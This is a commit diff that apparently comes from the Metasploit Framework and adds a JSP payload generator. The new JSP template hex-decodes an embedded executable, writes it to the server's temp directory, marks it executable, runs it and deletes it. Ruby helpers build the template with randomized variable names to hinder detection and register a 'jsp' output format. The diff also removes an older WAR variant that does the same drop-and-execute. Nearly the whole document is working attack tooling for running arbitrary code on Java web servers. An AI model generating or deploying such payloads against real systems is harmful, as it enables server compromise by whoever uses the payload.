Land #7283, add jsp payload generator
commit
4c4f2e45d6
|
@ -0,0 +1,38 @@
|
||||||
|
<%%@ page import="java.io.*" %%>
|
||||||
|
<%%
|
||||||
|
String %{var_payload} = "%{payload}";
|
||||||
|
String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
|
||||||
|
|
||||||
|
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) {
|
||||||
|
%{var_exepath} = %{var_exepath}.concat(".exe");
|
||||||
|
}
|
||||||
|
|
||||||
|
int %{var_payloadlength} = %{var_payload}.length();
|
||||||
|
byte[] %{var_bytes} = new byte[%{var_payloadlength}/2];
|
||||||
|
for (int %{var_counter} = 0; %{var_counter} < %{var_payloadlength}; %{var_counter} += 2) {
|
||||||
|
%{var_bytes}[%{var_counter} / 2] = (byte) ((Character.digit(%{var_payload}.charAt(%{var_counter}), 16) << 4)
|
||||||
|
+ Character.digit(%{var_payload}.charAt(%{var_counter}+1), 16));
|
||||||
|
}
|
||||||
|
|
||||||
|
FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
|
||||||
|
%{var_outputstream}.write(%{var_bytes});
|
||||||
|
%{var_outputstream}.flush();
|
||||||
|
%{var_outputstream}.close();
|
||||||
|
|
||||||
|
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
|
||||||
|
String[] %{var_fperm} = new String[3];
|
||||||
|
%{var_fperm}[0] = "chmod";
|
||||||
|
%{var_fperm}[1] = "+x";
|
||||||
|
%{var_fperm}[2] = %{var_exepath};
|
||||||
|
Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
|
||||||
|
if (%{var_proc}.waitFor() == 0) {
|
||||||
|
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
|
||||||
|
}
|
||||||
|
|
||||||
|
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
|
||||||
|
} else {
|
||||||
|
String[] %{var_exepatharray} = new String[1];
|
||||||
|
%{var_exepatharray}[0] = %{var_exepath};
|
||||||
|
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
|
||||||
|
}
|
||||||
|
%%>
|
|
@ -1,51 +0,0 @@
|
||||||
<%%@ page import="java.io.*" %%>
|
|
||||||
<%%
|
|
||||||
String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
|
|
||||||
String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
|
|
||||||
String %{var_data} = "";
|
|
||||||
|
|
||||||
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
|
|
||||||
{
|
|
||||||
%{var_exepath} = %{var_exepath}.concat(".exe");
|
|
||||||
}
|
|
||||||
|
|
||||||
FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath});
|
|
||||||
FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
|
|
||||||
|
|
||||||
int %{var_numbytes} = %{var_inputstream}.available();
|
|
||||||
byte %{var_bytearray}[] = new byte[%{var_numbytes}];
|
|
||||||
%{var_inputstream}.read(%{var_bytearray});
|
|
||||||
%{var_inputstream}.close();
|
|
||||||
byte[] %{var_bytes} = new byte[%{var_numbytes}/2];
|
|
||||||
for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2)
|
|
||||||
{
|
|
||||||
char %{var_char1} = (char) %{var_bytearray}[%{var_counter}];
|
|
||||||
char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1];
|
|
||||||
int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff;
|
|
||||||
%{var_comb} <<= 4;
|
|
||||||
%{var_comb} += Character.digit(%{var_char2}, 16) & 0xff;
|
|
||||||
%{var_bytes}[%{var_counter}/2] = (byte)%{var_comb};
|
|
||||||
}
|
|
||||||
|
|
||||||
%{var_outputstream}.write(%{var_bytes});
|
|
||||||
%{var_outputstream}.close();
|
|
||||||
|
|
||||||
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
|
|
||||||
String[] %{var_fperm} = new String[3];
|
|
||||||
%{var_fperm}[0] = "chmod";
|
|
||||||
%{var_fperm}[1] = "+x";
|
|
||||||
%{var_fperm}[2] = %{var_exepath};
|
|
||||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
|
|
||||||
if (%{var_proc}.waitFor() == 0) {
|
|
||||||
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
|
|
||||||
}
|
|
||||||
|
|
||||||
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
|
||||||
String[] %{var_exepatharray} = new String[1];
|
|
||||||
%{var_exepatharray}[0] = %{var_exepath};
|
|
||||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
|
|
||||||
}
|
|
||||||
%%>
|
|
|
@ -1407,6 +1407,40 @@ require 'msf/core/exe/segment_appender'
|
||||||
read_replace_script_template("to_powershell.hta.template", hash_sub)
|
read_replace_script_template("to_powershell.hta.template", hash_sub)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def self.to_jsp(exe)
|
||||||
|
hash_sub = {}
|
||||||
|
hash_sub[:var_payload] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_exepath] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_outputstream] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_payloadlength] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_counter] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_exe] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
|
||||||
|
payload_hex = exe.unpack('H*')[0]
|
||||||
|
hash_sub[:payload] = payload_hex
|
||||||
|
|
||||||
|
read_replace_script_template("to_exe.jsp.template", hash_sub)
|
||||||
|
end
|
||||||
|
|
||||||
|
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a
|
||||||
|
# payload. The jsp page converts the hexdump back to a normal binary file
|
||||||
|
# and places it in the temp directory. The payload file is then executed.
|
||||||
|
#
|
||||||
|
# @see to_war
|
||||||
|
# @param exe [String] Executable to drop and run.
|
||||||
|
# @param opts (see to_war)
|
||||||
|
# @option opts (see to_war)
|
||||||
|
# @return (see to_war)
|
||||||
|
def self.to_jsp_war(exe, opts = {})
|
||||||
|
template = self.to_jsp(exe)
|
||||||
|
self.to_war(template, opts)
|
||||||
|
end
|
||||||
|
|
||||||
def self.to_win32pe_vbs(framework, code, opts = {})
|
def self.to_win32pe_vbs(framework, code, opts = {})
|
||||||
to_exe_vbs(to_win32pe(framework, code, opts), opts)
|
to_exe_vbs(to_win32pe(framework, code, opts), opts)
|
||||||
end
|
end
|
||||||
|
@ -1500,52 +1534,6 @@ require 'msf/core/exe/segment_appender'
|
||||||
zip.pack
|
zip.pack
|
||||||
end
|
end
|
||||||
|
|
||||||
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a
|
|
||||||
# payload. The jsp page converts the hexdump back to a normal binary file
|
|
||||||
# and places it in the temp directory. The payload file is then executed.
|
|
||||||
#
|
|
||||||
# @see to_war
|
|
||||||
# @param exe [String] Executable to drop and run.
|
|
||||||
# @param opts (see to_war)
|
|
||||||
# @option opts (see to_war)
|
|
||||||
# @return (see to_war)
|
|
||||||
def self.to_jsp_war(exe, opts = {})
|
|
||||||
# begin <payload>.jsp
|
|
||||||
hash_sub = {}
|
|
||||||
hash_sub[:var_hexpath] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_exepath] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_data] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_inputstream] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_outputstream] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_numbytes] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_bytearray] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_counter] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_char1] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_char2] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_comb] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_exe] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_hexfile] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
|
|
||||||
# Specify the payload in hex as an extra file..
|
|
||||||
payload_hex = exe.unpack('H*')[0]
|
|
||||||
opts.merge!(
|
|
||||||
{
|
|
||||||
:extra_files =>
|
|
||||||
[
|
|
||||||
[ "#{hash_sub[:var_hexfile]}.txt", payload_hex ]
|
|
||||||
]
|
|
||||||
})
|
|
||||||
|
|
||||||
template = read_replace_script_template("to_exe_jsp.war.template", hash_sub)
|
|
||||||
|
|
||||||
self.to_war(template, opts)
|
|
||||||
end
|
|
||||||
|
|
||||||
# Creates a .NET DLL which loads data into memory
|
# Creates a .NET DLL which loads data into memory
|
||||||
# at a specified location with read/execute permissions
|
# at a specified location with read/execute permissions
|
||||||
# - the data will be loaded at: base+0x2065
|
# - the data will be loaded at: base+0x2065
|
||||||
|
@ -2221,6 +2209,12 @@ require 'msf/core/exe/segment_appender'
|
||||||
when 'loop-vbs'
|
when 'loop-vbs'
|
||||||
exe = exe = to_executable_fmt(framework, arch, plat, code, 'exe-small', exeopts)
|
exe = exe = to_executable_fmt(framework, arch, plat, code, 'exe-small', exeopts)
|
||||||
Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => true }))
|
Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => true }))
|
||||||
|
when 'jsp'
|
||||||
|
arch ||= [ ARCH_X86 ]
|
||||||
|
tmp_plat = plat.platforms if plat
|
||||||
|
tmp_plat ||= Msf::Module::PlatformList.transform('win')
|
||||||
|
exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, code, exeopts)
|
||||||
|
Msf::Util::EXE.to_jsp(exe)
|
||||||
when 'war'
|
when 'war'
|
||||||
arch ||= [ ARCH_X86 ]
|
arch ||= [ ARCH_X86 ]
|
||||||
tmp_plat = plat.platforms if plat
|
tmp_plat = plat.platforms if plat
|
||||||
|
@ -2258,6 +2252,7 @@ require 'msf/core/exe/segment_appender'
|
||||||
"exe-small",
|
"exe-small",
|
||||||
"hta-psh",
|
"hta-psh",
|
||||||
"jar",
|
"jar",
|
||||||
|
"jsp",
|
||||||
"loop-vbs",
|
"loop-vbs",
|
||||||
"macho",
|
"macho",
|
||||||
"msi",
|
"msi",
|
||||||
|
|
Loading…
Reference in New Issue